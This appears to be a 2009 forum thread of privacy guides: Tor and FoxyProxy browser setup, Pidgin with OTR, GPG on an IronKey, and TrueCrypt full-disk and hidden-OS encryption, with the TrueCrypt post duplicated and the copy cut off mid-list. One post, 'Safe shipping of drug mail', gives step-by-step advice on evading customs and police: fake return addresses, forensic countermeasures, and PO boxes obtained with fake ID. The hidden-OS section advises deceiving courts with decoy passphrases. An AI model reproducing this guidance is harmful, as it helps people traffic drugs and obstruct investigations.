You aren't going to be using the built in Firefox with SecureSessions, it has several flaws over regular ToR and doesn't improve speed that much. Download firefox portable (hxxp://portableapps.com/apps/internet/firefox_portable) and then install FoxyProxy (hxxps://addons.mozilla.org/en-US/firefox/addon/2464). FoxyProxy is better than TorButton for several reasons. TorButton leaks some info with FF3 and people always seem to have more trouble with it. Once this is installed right click the foxyproxy section on the bottom right of FF and right click -> ToR -> "Use ToR for ALL URLS" to ensure you don't accidently disable it and then browse sites go to Tools -> Options -> Advanced -> "Network" tab -> Settings -> and enable "Manual Proxy Configuration" put 127.0.0.1 in the first box and set the port to 9051 and then tick "Use this proxy server for all protocols". Disable foxyproxy and try browsing the web to test this.

While you're in options you may aswell disable Java (Tools -> Options -> Content -> untick "Enable Java") and disable Flash (Tools -> Add-Ons -> Plugins -> find flash and hit "disable")

It's advisable to also install NoScript (hxxp://noscript.net/) and CookieSafe (hxxps://addons.mozilla.org/en-US/firefox/addon/2497). However, if these plugins cause problems you can allow specific sites you trust.

Now for normal browsing I use Opera so that I don't mix up the two. Download Opera Portable (hxxp://www.opera-usb.com/operausben.htm)
Click to expand...

Instant Messaging

Download Pidgin Portable with OTR here (hxxp://sourceforge.net/project/showfiles.php?group_id=151265&package_id=242093&release_id=610846). Once that's install you may need to enable it in Tools -> Plug-ins.

To set it to run through ToR go to Tools -> Prefrences -> "Network" tab and down the bottom change "Proxy Type" to SOCKS5 set the host to 127.0.0.1 port 9050. To enable SSL so that your pw can't be sniffed go to Accounts -> Manage Accounts and select your AIM account hit "Modify" go to "Advanced" and change the port to 443. [note; this only works with AIM - [MSN uses SSL by default] also tick the box that says use proxy server for file transfers, etc.
Click to expand...

GPG

GPG doesn't work 100% on the IronKey yet. You can import keys, decrypt and encrypt messages. But doesn't let you create new keys, or export existing ones. The best programme I've found is GPG4USB (hxxp://gpg4usb.cpunk.de/download.html). FireGPG is currently incompatible with IronKey - but they are adding support in the next version
Click to expand...

.

FAQ:

How secure are IronKeys 'secure backups'?

To put it simply, not very.. SecureBackup creates a folder on your harddisk with all your files encrypted inside. Doing this removes all the hardware security measures your IronKey puts in place such as preventing bruce force attacks (self destruct after 10x attempts) etc. My suggestion; don't do backups unless you are really prone to loosing things or have data on your IronKey you cannot afford to loose. Even then, I suggest buying a cheap 1gb thumb drive and installing truecrypt on that and keeping on tat at a friends house.

Why are SecureSessions inferior to ToR?

IronKeys 'SecureSession' feature is actually a private onion network. Basically, it's ToR using nodes controlled by IronKey themselves. The benefits of this are obvious; no malicious nodes, faster speeds. However it means that if the government were to subpheona IronKey they could be forced to hand over your IP address (and they would easily be able to do that). If you're using sites with SSL (which elimates the threat of malicious nodes). Then it's best to stick to normal ToR.
--

And that's it! If anyone has any questions/comments please feel free to post
Click to expand...

binary shadow · Apr 1, 2009

Secure IM (Credit to previous author as well)

Installing Pidgin

You can download the latest version of Pidgin from their website. hxxp://www.pidgin.im/download/. download and install the executable.
Click to expand...

Installing OTR.

You can download the latest version of OTR from here. hxxp://www.cypherpunks.ca/otr/index.php#downloads run the executable once it downloads and it should install itself. You will need to enable the plugin in Tools -> Plug-ins -> and check the "Off-The-Record Messaging" box.
Click to expand...

Using OTR

The first time you talk to someone your Pidgin will generate your private/public keys this is a one-time thing and may take a minute or so.

Now, all you have to do is start talking to someone who has OTR. The first time you talk to them, you will see a dialog asking for you to accept their fingerprint. A fingerprint is a string of letters and numbers which uniquely identify a key.

Notice the button which says "OTR: Private" in the conversation window. This means your conversation is private. If the button says "OTR: Not private" and you wish to use OTR with this contact, simply press the button.
Click to expand...

Running Pidgin through ToR

First you need to make sure Videlia is installed and running. If you've already done that it is simple to enable ToR through Pidgin. Go To Tools -> Prefrences -> Network -> Change "Proxy Type" to "Socks5" set the 'Host' to "127.0.0.1" and the 'Port' to "9050". disconnect and reconnect all your connections for this to take effect. To test it's working correctly simply disable ToR and your connections should drop
Click to expand...

Running AIM though SSL.

Enabling SSL is vital as without it your password can be sniffed by anyone running a ToR node.

Accounts -> Manage Accounts -> Select your AIM account -> Modify -> Advanced and change the port to 443.

note; MSN by default goes through SSL - so leave that with the default configuration.
Click to expand...

Click to expand...

binary shadow · Apr 1, 2009

Safe shipping of drug mail

Safe shipping

What it is

Safe shipping means packaging and mailing products in ways that minimize risk for all involved. Safe shipping is more than packaging a product to reduce risk of interception, it is also using techniques to avoid liability for the shipper and recipient for any seized products.

List of things customs looks for

The following is a list of things customs uses to screen for suspicious parcels. A suspicious attribute of a parcel is called a flag. A single flag is often not much of a problem, but the more flags a package has the higher the chances it will be intercepted.

1. No return address

2. Restrictive markings (such as writing "Personal!" on the envelope)

3. Misspelled words

4. Poorly typed or written text

5. Excessive postage

6. Addressed to an incorrect title

7. Sent from a foreign country

8. Sealed with tape

9. Emits a strange odor (Including masking agents such as coffee, perfume and fabric softener sheets)

10. Lopsided, uneven, rigid, bulky or otherwise uneven weight distribution

11. Oily stains, discolorations and crystallizations on packaging

12. Packaging appears to be re-used

13. Package looks generally poorly prepared for shipping

14. addresses are hand written

15. addresses contain mispelled information (such as names, streets or cities)

16. Originate from a drug source state

17. Are addressed as being sent from an individual to an individual

18. Return address ZIP code does not match ZIP code of the post office the package is being sent from

19. A fictitious return address is used

20. List a sender or receiver name of a common type (Such as John Smith)

21. Make use of names that are not connected to either address

22. Package makes noise when shaken

23. Redistribution of weight is felt when package is moved or tilted

List of Ways customs uses technology to detect packages

1. Terahertz ray scanning

“illuminating a target envelope with tunable terahertz radiation and analyzing the absorption spectra of the resulting image. The
results are cross referenced with a database of spectra to check for the chemicals of interest.”

Currently it takes ten minutes to fully scan and analyze a single letter, although increasing this speed to one minute per letter is
in the grasp of current technology. Even with this potential decrease in the amount of time it takes to scan individual letters, this system
could not be implemented en masse without slowing the mail system down to a screeching halt. It is much more likely that this technology
will be used to scan mail that has already been flagged by customs personnel using other methods.

2. infrared and X-ray scanning

Infrared scanners and Xrays work fundamentally in the same way. They are used to detect irregularities in envelopes or packages, which is possible cause for further investigation by other more precise means.

4. Drug dogs

Drug dogs are trained to detect even trace amounts of controlled substances in the mail and are used by virtually all customs
agencies world wide. Despite their excellent ability to detect certain substances, the overwhelming amount of mail in the system means
that they will not be able to sniff all mail. In addition to this, drug dogs are not trained to smell the vast majority of existing psychoactive
substances, and due to the staggering number of said substances it is virtually impossible that they ever will be.

5. Drug residue detectors

“traces of controlled substances are collected on a small filter held in the end of a vacuum sweeper hose which has been
previously tested to insure no contamination. The instrument uses an analytical technique in which the traces of controlled substances on
the filter are heated to vapors and ionized. The time required for the ions to drift through an electric field is measured and the substances
are identified by the "drift" time through the electric field. ”

list of ways customs trace intercepted mail and gather evidence

1. Fingerprinting the outside and inside of a package

2. Handwriting analysis

3. Analyzing paper and ink

4. Analyzing type impressions

5. Forensic analysis of trace evidence (Adhesives, fibers, hair, paint, paper, plastic, rubber, tape and insulation from safes).

6. Post office surveillance of individuals suspected of sending or receiving drug mail

7. To bust recipients of intercepted drug mail, customs officials will often dress as postmen and make an arrest after the suspect accepts the package. Often times they will allow a few minutes to pass in hopes that the suspect will have opened the package.

8. There are reports of tracking devices being hidden inside intercepted packages when they are being sent to a safe location such as fraudulently obtained PO boxes. The tracking devices then follow the receipient back to their base location where an arrest is later made.

Packaging tips for senders

Labeling

1. Use a real return address but make sure it has no connection to you. Ensure the ZIP code used is the same one of the drop box you plan to send the package from. A generally sound practice is to use the legitimate address of an apartment complex but do NOT specify an actual number.

2. Change return addresses, especially the name sent from, on a semi frequent basis. The name used should be generic but not overly common.

3. Keep the front of the package as clean as possible. It should have no markings other than a shipping and return address.

4. Double check to make sure all information is correct. Also ensure that all words are spelled correctly.

5. Both addresses should be typed and printed, not handwritten. Ensure the printer used has minimal connection to you (paid for in cash, from a friend, not used for other things)

6. Exact postage should be applied neatly to the package.

7. Do not seal the package with tape

8. Use self adhesive envelopes and stamps.

Packaging

1. Do not attempt to use masking scents

2. Double vacuum seal the substance, attempting to spread substance out as thinly and evenly as possible

3. Using heavy duty tape, secure the vacuum sealed bag to a piece of construction paper. Make sure it is secured tightly and that product does not make noises when shaken.

4. Fold the construction paper over on itself to make it take up as little area as possibly yet still be accommodating for the vacuum sealed bag.

5. If the thicker cardboard priority envelopes are available, the first envelope should be inserted into one of these. Both envelopes should be addressed.

Security tips for senders

1. At all stages of packaging gloves should be worn. Latex gloves should NOT be used by themselves. Tight fitting gloves made out of cloth or some other material should be utilized. During the stage of packaging where you come in contact with the substance, latex gloves should be worn over the regular gloves. After the substance is vacuum sealed, the latex over gloves should be removed and disposed of before coming into contact with the outer parts of the packaging, to avoid contaminating it with trace amounts of the substance.

2. Hairnets and long sleeved clothing should be worn during all stages of packaging to prevent hairs from entering the package.

3. Packages should not be sent from inside post offices but from random drop boxes away from cameras and buildings with cameras. Some care should none the less be taken to disguise facial features and identifying marks.

4. keep in mind that the total weight of a package sent via one of the drop off boxes, at least in the United States, is 13 ounces or less.

Security tips for recipients

1. The best option for recipients it to use PO boxes or PMBs obtained with fake identification. Mom and Pop box companies often have poor security compared to franchises, for example they are less likely to require photocopies of the ID and also are less likely to have a camera system, or if they do have a camera system it is probably very poor as compared to a big franchise company. Recipients using PO boxes should wait for a lengthy yet random period of time after the package arrives to attempt retrieval. This waiting period dramatically decreases the chances of being apprehended as prolonged surveillance is very expensive. Disguising efforts should be utilized when retrieving packages, and test runs should also be attempted.

2. Another excellent option is to have packages sent to abandoned buildings or houses. The same security methods should be applied as when using a fraudulently obtained mail box.

3. If a recipient must have a package delivered to a place connected with them, they should ensure said place is clean between shipments. Clean houses of friends can also be used. Upon receiving a package to a place with connections to the recipient, they should not open it and write return to sender on it. After several days, then the package is safe to be opened. Recipient should NEVER select to have shipping methods which require a package to be signed for.

4. Regardless of the place the package is delivered, the recipient should opt the quickest shipping method possible so long as a signature is not required. This way if their are delays in shipping, it can alert the recipient, and it will require any interceptor to rush getting warrants prepared before a suspicious delay in package delivery is noticed. Tracked mail with out delivery confirmation is an excellent option, as the recipient can follow the status of the package online (using Tor!) and can be alerted if the package is held by customs for a prolonged period of time.
Click to expand...

binary shadow · Apr 1, 2009

Encrypt windows XP hard drive + truecrypt containers

Truecrypt for Windows

What it is

Truecrypt is a free and open source encryption program. It can be used to create securely encrypted shell files, securely encrypt entire partitions and drives and even create hidden operating systems. Truecrypt has built in features that allow for plausible deniabilty by giving you the ability to create hidden sections of encrypted areas.

What you need to get

You will need to get the truecrypt program, which can be found at the following location www.truecrypt.org/downloads.php

Install it

The installation is self explanatory.

Encrypt your entire Hard Drive

1. Launch Truecrypt 6. From the top bar, select system and from the drop down list select encrypt system partition/drive. A new window will pop up.

2. Leave "Normal" checked and click next. Leave "Encrypt the whole drive" checked and click next.

3. Depending on your computer set up you may want to pick yes or no for "encryption of host protected area". If you have a laptop with a "system recovery" feature like usually comes pre-installed on store bought laptops, you will probably not want to encrypt this area. If you have certain raid configurations that require tools/data to be booted before the OS is booted, you should not select to encrypt this area. If you use system diagnostic tools that must be booted before the OS, you should select no. If you have a standard set up computer that boots directly into the OS (after the standard things, bios etc) then you should select yes to encrypt this area.

4. Click next and wait for Truecrypt to finish scanning for hidden sectors.

5. Select the appropriate option, depending on if you dual boot (you use more than one OS on the same system) or single boot (You have only one operating system installed).

6. Select your algorithm. AES-256 is the standard algorithm used for encryption of top secret documents. The name of the algorithm is actually Rijndael, AES is a title it "won" which stands for the "Advanced Encryption Standard". Another encryption algorithm that participated in this competition was Serpent. Although Serpent did not win the competition, it rated significantly higher in security. Serpent-256 is more secure than AES-256, but it is much slower to encrypt and decrypt which is why it lost the competition (the algorithms were tested for security, speed and other criteria. Rijndael was the best over all, Serpent was the best for security). AES is usually around two to three times faster than serpent. You are unlikely to notice much of a performance hit using either form of encryption, unless you do high intensity activity that requires the hard drive to be written to a lot. I have heard people having some slight performance hits with some high intensity games using AES, the performance hits would have been a good deal more if they were using Serpent. But this depends a lot on your systems quality as well. Also transferring large files back and forth between media and your hard drive may take a while longer with Serpent than it will with AES, and a while longer with AES than it would with no encryption. But it shouldn't really be hugely noticeable either way unless you frequently toss multi gig files from drive to drive, or you play very intense games that use the hard drive a lot. If you do require a fast hard drive for games or multimedia editing, use AES. If you don't do many system intense activities, Serpent is probably better. Twofish to the best of my understanding isn't a particularly great algorithm, but is better used in cascades because it uses a different mathematical concept than AES or Serpent, and thus if a cascade is used and a weakness is found in the fundamental concept of AES or Serpent, your data will still be safe as it is also protected with Twofish. But using cascades for full drive encryption is not a good idea because the keys can not fit into the first drive track and will frequently corrupt requiring you to always be fixing it. It also might not work at all on older computers. So depending on your computer equipment, select either AES (Not very powerful computer, or powerful computer but you do a lot of gaming or frequently transfer large files from drive to drive) or Serpent (Powerful computer, or average computer but you don't do a lot of gaming and require the best security you can get)

7. Pick a hash algorithm. Unfortunately you need to pick ripemd-160, sha-512 or whirlpool would both be much better suited for this but they are not supported for full drive encryption. I think ripemd-160 has some serious weaknesses in it, but according to Truecrypt, for what it is used (RNG) the security holes shouldn't really make much of a difference. You don't have any choice in the matter, and it is certainly far far better to use this hash than to not encrypt your drive, so go with it.

8. Click next.

9. Type in a passphrase and confirm it. The passphrase should be quite long, over twenty characters, and should include numbers, letters, spaces, capitals, and special characters. Make it something you can remember with out writing down as well. You do not want to write your passphrase down anywhere, ever! Click next.

10. Randomly move your mouse around for like ten minutes in the window that displays the matrix looking thing. The longer you move your mouse, the more randomness it can gather, the more secure your encryption will be. Towards the end you might want to hide the numbers for a bit I guess. After five or ten minutes of this, click next.

11. Click next again.

12. Now you need to follow the instructions and create a truecrypt rescue CD. This is very important, if anything ever messes up you will NEED to boot from this CD to fix it. Don't lose the CD! Even if an adversary finds the CD they will still need to know your passphrase to get onto your system so don't worry about it getting stolen. But don't lose it because if *anything* goes wrong at *any* point with your encryption you absolutely will need this CD.

13. After verifying that you have created the rescue CD, you need to select a Wipe mode. If you use no wipe mode, you are at risk of forensic analysis of the data currently on your machine being discovered. The stronger wipe mode you use, the less the chances of this are. I suggest either a 7 pass DoD (Which is the standard for wiping drives which contain top secret classified information on them) or a 35 pass Gutmann wipe (which will work much better for old hard drives, but on new hard drives it is questionable if it is much if any better than a 7 pass DoD wipe, even though it will take probably a little under two full days to finish). You will still be able to use your computer while the wipe takes place, and you can pause and restart the wipe at any point. Keep in mind the files of your computer are NOT being erased. At the very least you should do a three pass wipe, you should absolutely not do no wipe at all. I would suggest a 7 pass wipe personally, unless it is a fairly old hard drive.

14. You will now be asked to test the encryption by rebooting. Give it a shot and see if it goes smoothly. Keep in mind it has not yet been encrypted at this point and is merely testing the framework. You will be required to enter your new password.

15. After the reboot, in Truecrypt select the encrypt button. The encryption will take a good bit of time depending on what algorithm you selected and what wipe mode you selected, as well as what sort of hardware you have and how big your drive is. I doubt it takes any longer than three days, and less than 24 hours is more likely.

Way to go, your hard drive is now protected with military level encryption. You will need to type in your passphrase each time you boot up. You should leave your computer off when you are not using it. While it is on it is encrypted but mounted, and could have the decrypted content taken off of it and transferred to another drive that is not encrypted. This could be done secretly while you are not at home, or it could be done after you are held hostage and powerless to turn it off. So keep it off when you are not using it, or not in the general area EX: your house. Also, if it is on and you get an unfriendly visit from some thugs, turn it off ASAP, even if you turn it off by kicking it over or something. If it is off, you are safe, if it is on you are at some risk still. Although usually it would be turned off anyways, sometimes the adversary is smart enough to keep it turned on until they can make an image of the drives contents.

To create a hidden OS in Windows XP/Vista

1. First of all you have some basic requirements that need to be met.

A. You must have two partitions on the hard drive that has the partition your OS is installed to. One of the partitions needs to be the one your OS is installed on.

B. The second partition needs to be the first partition behind the partition your OS is installed to and it must be at least 2.1 times bigger than the partition your OS is installed to.

C. For example, with a 100 gig hard drive, two partitions must be made during installation of the OS. The OS needs to be installed to the second partition, would be 30 gigabytes in size. The first partition needs to be left blank and have at least 63 gigabytes allocated to it (but might as well make it 70 gigabytes). This is a big drain on system resources as 70% of your hard drive is now dedicated to having a hidden volume, but it offers you probable deniability in court and you can give up a passphrase with out giving away your real passphrase and you wont be held in contempt of court. It wouldn't be a bad idea to use your smallest hard drive to make the hidden OS on, and then have a large hard drive to store media on that is separately fully encrypted so you minimize the amount of wasted space.

D. Your drive at the time of creating a hidden OS must contain *no* sensitive information, because your regular partition is going to be your decoy that you can give the passphrase to away.

E. Your OS must be activated by windows. I don't know if this will matter a great deal for pirated copies or if you can even activate them. You might want to look into this more yourself.

F. Take the same precautions you would take if you were making a shell file with a hidden section IE: Turn off system restore points, disable the paging file, turn off hibernation, ETC...

2. If these requirements are met, start up truecrypt and go to the system tab on the top bar. Click encrypt system partition/drive, and when presented with the options check "hidden".

3. Select the appropriate option, depending on if you dual boot (you use more than one OS on the same system) or single boot (You have only one operating system installed).

4. Click next until you are asked what algorithm and hash you want to use for your outer volume (the one you can give up with out having to worry). I would probably pick AES since this is just decoy encryption anyways and AES is much faster than serpent. Again, ripemd-160 is required as your hash. Click next.

5. Click next until you are required to enter a passphrase. Enter a passphrase that you will not have a great deal of trouble to remember. It should still be fairly secure though, if you are ever taken to court you will want to refuse to decrypt the computer and see if you are held in contempt. You may even choose to do a few days or weeks in jail while in contempt of court before finally agreeing to give up a passphrase. If they decide they can't hold you for very long, it is better for them to get nothing than to get a decoy. So do take some care in selecting this passphrase, but make sure you can remember it. And make sure it will be nothing like your real passphrase. You can give this passphrase up if worst comes to worst. Click next.

6. It will ask if you need to be able to store large files (files over 4 gigs). I assume you are going to not want to be limited to four gig files so you should select yes. If you can live with out four gig files the size of the partition for your hidden OS only needs to be 10% larger than the partition your regular OS is on, but I imagine most people are not going to be happy limiting themselves to files of this size. So go with over 4 gigs and NTFS will be used (versus FAT).

7. It will tell you that you probably want to use FAT. You may want to really, but this will limit file size to only four gigabytes so I figure you really probably don't. It will make better use of your hard drive if you do, and allow for much more of your drive to be allocated to your regular partition, but at the same time it will force you to use FAT and all the shit that comes along with this (4 gig max file size being one). Click yes or no, it is up to you and your wants / needs. But I suggest you click yes probably.

8. Move your mouse around as randomly as possible for about five or ten minutes. The longer and the more randomly you do this, the stronger the encryption will be. You may want to hide the numbers / letters after a bit, I guess. After five or ten minutes, click next.

9. Answer yes again to the same pop up. Another pop up will come up telling you the files on the partition behind your OS partition will be wiped clean. This shouldn't be an issue as you shouldn't have had anything on this partition yet anyways. If you did and you need to keep it, move it to your OS partition. Click Yes.

10. Click format and wait for it to finish.

11. Click next until you see the button that says to open the outer volume. Put some random fake-sensitive stuff in here, like porn or whatever. Click next.

12. Click next until it asks you to pick the algorithm for your hidden volume. Read post 7 from the above tutorial when selecting your algorithm. Again, stuck with Ripemd-160. Click next.

13. You must now select a new passphrase. Make this one very good and different from the other one you already made and the next one you are going to make. This is one that you can not give up with out screwing yourself. It should be at least twenty characters long and include letters, numbers, capitals, spaces and special characters. Click next.

14. Move your mouse around randomly again, for five or ten minutes. You may want to hide the numbers/letters in the random pool. After five or ten minutes, click next.

15. Click next until asked to enter a passphrase for your decoy operating system. This is another passphrase you can give up if you are ever forced to. And should actually be the first one you give up in court to get out of contempt. As always, you should push your luck and do a few days or weeks in jail first to see how serious they are about getting any passphrase at all. After typing in your sort of hard but easy to remember decoy passphrase, click next.

16. Move the mouse around gathering random data as usual. After five or ten minutes, click next. You may not want to have the matrix looking numbers / letters displayed.

17. Keep hitting next until it makes you create a rescue CD. Follow the instructions for this. You need a rescue CD and you should keep your rescue CD in a safe location. They can not decrypt the OS with out the passphrase even if they get the rescue CD but you should still keep it safe and hidden. I am not sure if they can tell if you have a hidden os or not from examining the rescue CD, but I doubt it can be done since the contents of the rescue CD are already on the first track of the hard drive decrypted.

18. Keep hitting next until asked about operating system cloning. Then hit Yes. Your current real OS (which should have no incriminating information on it!) will be copied to the hidden OS partition. You must restart. Also make sure the rescue CD is NOT in the drive at the point where you restart. Take it out and keep it out, stored in a safe location, probably best in a hidden location or a safe house but really this is truly probably not necessary .

19. After the reboot you will be asked for your hidden OS pass phrase. Type it in.

20. Now your regular OS will be copied to the hidden partition. This will take some time. After it is done, you will be prompted for your decoy system pass phrase. Type it in.

21. now you will be taken back to windows. In Truecrypt, you must now select to encrypt your decoy operating system (the OS you are currently using). This will also take some time.

22. Now that this is all done, you will be able to enter three passphrases when prompted to do so after boot:

A. Boot password for hidden operating system (NEVER EVER GIVE THIS UP TO ANYONE UNLESS THEY HAVE A GUN TO YOUR HEAD AND SAY EITHER GIVE US THREE PASSPHRASES OR YOU WILL DIE REGARDLESS OF IF YOU HAVE A HIDDEN OS OR NOT, YOU BETTER HOPE YOU DO OR YOU ARE DEAD ANYWAYS LOL)

B. Boot password for decoy operating system (You can give this one up if forced to, but it is still better to pretend you do not remember your passphrase and see if you are held in contempt of court. Once you are held in contempt, do as much time in jail as you possibly can manage to the full time saying you forgot your passphrase, and see if you ever get let out. If you can no longer stand it then suddenly remember your decoy passphrase and feel free to give that up)

C. Outer volume password (If you are forced to give up the password to the first partition, you can give this up. Again, forget it for as long as you can stand. After giving this up they still can not prove you have a hidden OS probably, I do still need to do more in depth reading of the article Sade posted to make sure)

23. After finishing, you must shut down your computer and leave it off for several minutes while the ram returns to a more random state. You can now boot on the computer and enter the password you want.

You should use the hidden OS for ALL things that are incriminating as well as randomly use it for things which are not incriminating but have no links to your personal life (random internet surfing, random listening to music or game playing, whatever). You should use the decoy OS for all things that are not incriminating. Try to use both of them about equally if at all possible.

NOTE: DO NOT WRITE TO THE HIDDEN VOLUME. THIS IS WHERE YOU PUT THE "FAKE" INCRIMINATING FILES. WRITING TO THIS COULD DAMAGE OR RUIN THE HIDDEN OS. YOU SHOULD JUST LEAVE IT ALONE AFTER PUTTING THE INITIAL FAKE INCRIMINATING FILES INTO IT.

Now you have no reason to turn off your computer if you get a surprise visit, unless you are inside your hidden OS. If you are in the decoy OS you can leave it on. If you are in the hidden os though, turn it off as quick as you can, even if that means you need to kick it down and make it power off.
Click to expand...

binary shadow · Apr 1, 2009

Encrypt windows XP hard drive + truecrypt containers

Truecrypt for Windows

What it is

Truecrypt is a free and open source encryption program. It can be used to create securely encrypted shell files, securely encrypt entire partitions and drives and even create hidden operating systems. Truecrypt has built in features that allow for plausible deniabilty by giving you the ability to create hidden sections of encrypted areas.

What you need to get

You will need to get the truecrypt program, which can be found at the following location www.truecrypt.org/downloads.php

Install it

The installation is self explanatory.

Encrypt your entire Hard Drive

1. Launch Truecrypt 6. From the top bar, select system and from the drop down list select encrypt system partition/drive. A new window will pop up.

2. Leave "Normal" checked and click next. Leave "Encrypt the whole drive" checked and click next.

3. Depending on your computer set up you may want to pick yes or no for "encryption of host protected area". If you have a laptop with a "system recovery" feature like usually comes pre-installed on store bought laptops, you will probably not want to encrypt this area. If you have certain raid configurations that require tools/data to be booted before the OS is booted, you should not select to encrypt this area. If you use system diagnostic tools that must be booted before the OS, you should select no. If you have a standard set up computer that boots directly into the OS (after the standard things, bios etc) then you should select yes to encrypt this area.

4. Click next and wait for Truecrypt to finish scanning for hidden sectors.

5. Select the appropriate option, depending on if you dual boot (you use more than one OS on the same system) or single boot (You have only one operating system installed).

6. Select your algorithm. AES-256 is the standard algorithm used for encryption of top secret documents. The name of the algorithm is actually Rijndael, AES is a title it "won" which stands for the "Advanced Encryption Standard". Another encryption algorithm that participated in this competition was Serpent. Although Serpent did not win the competition, it rated significantly higher in security. Serpent-256 is more secure than AES-256, but it is much slower to encrypt and decrypt which is why it lost the competition (the algorithms were tested for security, speed and other criteria. Rijndael was the best over all, Serpent was the best for security). AES is usually around two to three times faster than serpent. You are unlikely to notice much of a performance hit using either form of encryption, unless you do high intensity activity that requires the hard drive to be written to a lot. I have heard people having some slight performance hits with some high intensity games using AES, the performance hits would have been a good deal more if they were using Serpent. But this depends a lot on your systems quality as well. Also transferring large files back and forth between media and your hard drive may take a while longer with Serpent than it will with AES, and a while longer with AES than it would with no encryption. But it shouldn't really be hugely noticeable either way unless you frequently toss multi gig files from drive to drive, or you play very intense games that use the hard drive a lot. If you do require a fast hard drive for games or multimedia editing, use AES. If you don't do many system intense activities, Serpent is probably better. Twofish to the best of my understanding isn't a particularly great algorithm, but is better used in cascades because it uses a different mathematical concept than AES or Serpent, and thus if a cascade is used and a weakness is found in the fundamental concept of AES or Serpent, your data will still be safe as it is also protected with Twofish. But using cascades for full drive encryption is not a good idea because the keys can not fit into the first drive track and will frequently corrupt requiring you to always be fixing it. It also might not work at all on older computers. So depending on your computer equipment, select either AES (Not very powerful computer, or powerful computer but you do a lot of gaming or frequently transfer large files from drive to drive) or Serpent (Powerful computer, or average computer but you don't do a lot of gaming and require the best security you can get)

7. Pick a hash algorithm. Unfortunately you need to pick ripemd-160, sha-512 or whirlpool would both be much better suited for this but they are not supported for full drive encryption. I think ripemd-160 has some serious weaknesses in it, but according to Truecrypt, for what it is used (RNG) the security holes shouldn't really make much of a difference. You don't have any choice in the matter, and it is certainly far far better to use this hash than to not encrypt your drive, so go with it.

8. Click next.

9. Type in a passphrase and confirm it. The passphrase should be quite long, over twenty characters, and should include numbers, letters, spaces, capitals, and special characters. Make it something you can remember with out writing down as well. You do not want to write your passphrase down anywhere, ever! Click next.

10. Randomly move your mouse around for like ten minutes in the window that displays the matrix looking thing. The longer you move your mouse, the more randomness it can gather, the more secure your encryption will be. Towards the end you might want to hide the numbers for a bit I guess. After five or ten minutes of this, click next.

11. Click next again.

12. Now you need to follow the instructions and create a truecrypt rescue CD. This is very important, if anything ever messes up you will NEED to boot from this CD to fix it. Don't lose the CD! Even if an adversary finds the CD they will still need to know your passphrase to get onto your system so don't worry about it getting stolen. But don't lose it because if *anything* goes wrong at *any* point with your encryption you absolutely will need this CD.

13. After verifying that you have created the rescue CD, you need to select a Wipe mode. If you use no wipe mode, you are at risk of forensic analysis of the data currently on your machine being discovered. The stronger wipe mode you use, the less the chances of this are. I suggest either a 7 pass DoD (Which is the standard for wiping drives which contain top secret classified information on them) or a 35 pass Gutmann wipe (which will work much better for old hard drives, but on new hard drives it is questionable if it is much if any better than a 7 pass DoD wipe, even though it will take probably a little under two full days to finish). You will still be able to use your computer while the wipe takes place, and you can pause and restart the wipe at any point. Keep in mind the files of your computer are NOT being erased. At the very least you should do a three pass wipe, you should absolutely not do no wipe at all. I would suggest a 7 pass wipe personally, unless it is a fairly old hard drive.

14. You will now be asked to test the encryption by rebooting. Give it a shot and see if it goes smoothly. Keep in mind it has not yet been encrypted at this point and is merely testing the framework. You will be required to enter your new password.

15. After the reboot, in Truecrypt select the encrypt button. The encryption will take a good bit of time depending on what algorithm you selected and what wipe mode you selected, as well as what sort of hardware you have and how big your drive is. I doubt it takes any longer than three days, and less than 24 hours is more likely.

Way to go, your hard drive is now protected with military level encryption. You will need to type in your passphrase each time you boot up. You should leave your computer off when you are not using it. While it is on it is encrypted but mounted, and could have the decrypted content taken off of it and transferred to another drive that is not encrypted. This could be done secretly while you are not at home, or it could be done after you are held hostage and powerless to turn it off. So keep it off when you are not using it, or not in the general area EX: your house. Also, if it is on and you get an unfriendly visit from some thugs, turn it off ASAP, even if you turn it off by kicking it over or something. If it is off, you are safe, if it is on you are at some risk still. Although usually it would be turned off anyways, sometimes the adversary is smart enough to keep it turned on until they can make an image of the drives contents.

To create a hidden OS in Windows XP/Vista

1. First of all you have some basic requirements that need to be met.

A. You must have two partitions on the hard drive that has the partition your OS is installed to. One of the partitions needs to be the one your OS is installed on.

B. The second partition needs to be the first partition behind the partition your OS is installed to and it must be at least 2.1 times bigger than the partition your OS is installed to.

C. For example, with a 100 gig hard drive, two partitions must be made during installation of the OS. The OS needs to be installed to the second partition, would be 30 gigabytes in size. The first partition needs to be left blank and have at least 63 gigabytes allocated to it (but might as well make it 70 gigabytes). This is a big drain on system resources as 70% of your hard drive is now dedicated to having a hidden volume, but it offers you probable deniability in court and you can give up a passphrase with out giving away your real passphrase and you wont be held in contempt of court. It wouldn't be a bad idea to use your smallest hard drive to make the hidden OS on, and then have a large hard drive to store media on that is separately fully encrypted so you minimize the amount of wasted space.

D. Your drive at the time of creating a hidden OS must contain *no* sensitive information, because your regular partition is going to be your decoy that you can give the passphrase to away.

E. Your OS must be activated by windows. I don't know if this will matter a great deal for pirated copies or if you can even activate them. You might want to look into this more yourself.

F. Take the same precautions you would take if you were making a shell file with a hidden section IE: Turn off system restore points, disable the paging file, turn off hibernation, ETC...

2. If these requirements are met, start up truecrypt and go to the system tab on the top bar. Click encrypt system partition/drive, and when presented with the options check "hidden".

3. Select the appropriate option, depending on if you dual boot (you use more than one OS on the same system) or single boot (You have only one operating system installed).

4. Click next until you are asked what algorithm and hash you want to use for your outer volume (the one you can give up with out having to worry). I would probably pick AES since this is just decoy encryption anyways and AES is much faster than serpent. Again, ripemd-160 is required as your hash. Click next.

5. Click next until you are required to enter a passphrase. Enter a passphrase that you will not have a great deal of trouble to remember. It should still be fairly secure though, if you are ever taken to court you will want to refuse to decrypt the computer and see if you are held in contempt. You may even choose to do a few days or weeks in jail while in contempt of court before finally agreeing to give up a passphrase. If they decide they can't hold you for very long, it is better for them to get nothing than to get a decoy. So do take some care in selecting this passphrase, but make sure you can remember it. And make sure it will be nothing like your real passphrase. You can give this passphrase up if worst comes to worst. Click next.

6. It will ask if you need to be able to store large files (files over 4 gigs). I assume you are going to not want to be limited to four gig files so you should select yes. If you can live with out four gig files the size of the partition for your hidden OS only needs to be 10% larger than the partition your regular OS is on, but I imagine most people are not going to be happy limiting themselves to files of this size. So go with over 4 gigs and NTFS will be used (versus FAT).

7. It will tell you that you probably want to use FAT. You may want to really, but this will limit file size to only four gigabytes so I figure you really probably don't. It will make better use of your hard drive if you do, and allow for much more of your drive to be allocated to your regular partition, but at the same time it will force you to use FAT and all the shit that comes along with this (4 gig max file size being one). Click yes or no, it is up to you and your wants / needs. But I suggest you click yes probably.

